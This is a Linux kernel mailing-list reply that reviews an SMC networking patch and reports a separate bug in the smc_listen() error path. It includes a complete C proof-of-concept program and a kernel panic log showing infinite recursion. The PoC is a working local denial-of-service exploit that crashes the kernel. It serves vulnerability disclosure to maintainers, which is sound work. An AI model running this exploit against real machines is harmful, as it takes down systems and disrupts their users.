Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready

From: XIAO WU

Date: Tue Jun 23 2026 - 06:39:16 EST


Hi Runyu,

Thanks for this patch.

> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
>  {
>      struct smc_sock *lsmc;
>
> +    if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> +        return;
> +
>      read_lock_bh(&listen_clcsock->sk_callback_lock);
>      lsmc = smc_clcsock_user_data(listen_clcsock);

The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.

Sashiko AI review also looked at this patch and flagged a separate
pre-existing issue nearby — the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails:

https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@xxxxxxxxxx

The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):

        smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;

        smc->af_ops = *smc->ori_af_ops;
        smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;

        inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;

        if (smc->limit_smc_hs)
                tcp_sk(smc->clcsock->sk)->smc_hs_congested = smc_hs_congested;

        rc = kernel_listen(smc->clcsock, backlog);
        if (rc) {
write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
 &smc->clcsk_data_ready);
                rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
                goto out;
        }

The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already
set to smc_tcp_syn_recv_sock).  I verified this in a QEMU VM and can
confirm it triggers a real kernel stack overflow.

=== Reproduction ===

Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU: qemu-system-x86_64 -m 2G -smp 2

Trigger sequence:
  1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
     → clcsock gets SO_REUSEADDR via smc_bind() copy
  2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
     → Both non-TCP_LISTEN at bind time → bind OK
     → C enters TCP_LISTEN after its listen()
  3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
     → icsk_af_ops NOT restored → clcsock points to wrapper
  4. Close TCP C (free port), listen(A) again → succeeds
     → ori_af_ops now points to wrapper with syn_recv_sock = smc_tcp_syn_recv_sock
  5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
     → infinite recursion → IRQ stack guard page hit → kernel panic

=== Full PoC ===

Compile with: gcc -o poc poc.c -static

// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif

int main(void)
{
    int smc_a, tcp_c, client;
    struct sockaddr_in addr;
    pid_t child;
    int status, ret;
    socklen_t len;
    int val;

    printf("=== SMC listen error path -> stack overflow PoC ===\n\n");

    /* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
    printf("[1] Create SMC socket A with SO_REUSEADDR\n");
    smc_a = socket(PF_SMC, SOCK_STREAM, 0);
    if (smc_a < 0) { perror("smc socket"); return 1; }
    val = 1;
    setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = 0;
    if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind smc_a"); close(smc_a); return 1;
    }
    len = sizeof(addr);
    if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
        perror("getsockname"); close(smc_a); return 1;
    }
    int port = ntohs(addr.sin_port);
    printf("  SMC A bound to port %d\n", port);

    /* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
    printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
    tcp_c = socket(AF_INET, SOCK_STREAM, 0);
    val = 1;
    setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(port);
    if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind tcp_c"); close(tcp_c); close(smc_a); return 1;
    }
    if (listen(tcp_c, 5) < 0) {
        perror("listen tcp_c"); close(tcp_c); close(smc_a); return 1;
    }
    printf("  TCP C listening on port %d\n", port);

    /* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
    printf("[3] listen(SMC A) — expect failure... ");
    fflush(stdout);
    ret = listen(smc_a, 5);
    if (ret == 0) {
        printf("succeeded! Unexpected.\n");
        close(tcp_c); close(smc_a);
        return 1;
    }
    printf("failed: %s\n", strerror(errno));

    /* Step 4: Close TCP C to free the port */
    printf("[4] Close TCP C to free port %d\n", port);
    close(tcp_c);
    sleep(1);

    /* Step 5: listen(A) again → succeeds but ori_af_ops is self-referential */
    printf("[5] listen(SMC A) again... ");
    fflush(stdout);
    ret = listen(smc_a, 5);
    if (ret < 0) {
        printf("failed: %s, retrying...\n", strerror(errno));
        sleep(2);
        ret = listen(smc_a, 5);
    }
    if (ret < 0) {
        perror("retry"); close(smc_a); return 1;
    }
    printf("succeeded! ori_af_ops->syn_recv_sock == smc_tcp_syn_recv_sock\n");

    /* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK OVERFLOW */
    printf("[6] TCP connect → triggers infinite recursion...\n");
    fflush(stdout);

    child = fork();
    if (child == 0) {
        client = socket(AF_INET, SOCK_STREAM, 0);
        if (client < 0) exit(1);
        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        addr.sin_port = htons(port);
        if (connect(client, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
            perror("connect");
            exit(1);
        }
        sleep(3);
        close(client);
        exit(0);
    }

    printf("Waiting for crash...\n");
    sleep(5);
    if (waitpid(child, &status, WNOHANG) == 0) {
        printf("Child still alive — check dmesg\n");
        kill(child, SIGKILL);
        waitpid(child, NULL, 0);
    }
    close(smc_a);
    return 0;
}

=== Crash Log ===

Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)

[ 1453.562682][    C0] BUG: IRQ stack guard page was hit at ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][    C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][    C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][    C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][    C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][    C0] Call Trace:
[ 1453.562970][    C0]  <IRQ>
[ 1453.562980][    C0]  lock_acquire+0x1ae/0x360
[ 1453.562995][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][    C0]  smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][    C0]  ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563200][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
                        [... 15+ recursive frames ...]
[ 1453.564373][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][    C0] RIP: 0033:0x423574
[ 1453.577319][    C0] Kernel panic - not syncing: Fatal exception in interrupt

The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames — each iteration calls
ori_af_ops->syn_recv_sock(), which is itself, pushing a new frame
until the IRQ stack guard page is hit.

Thanks,
Xiao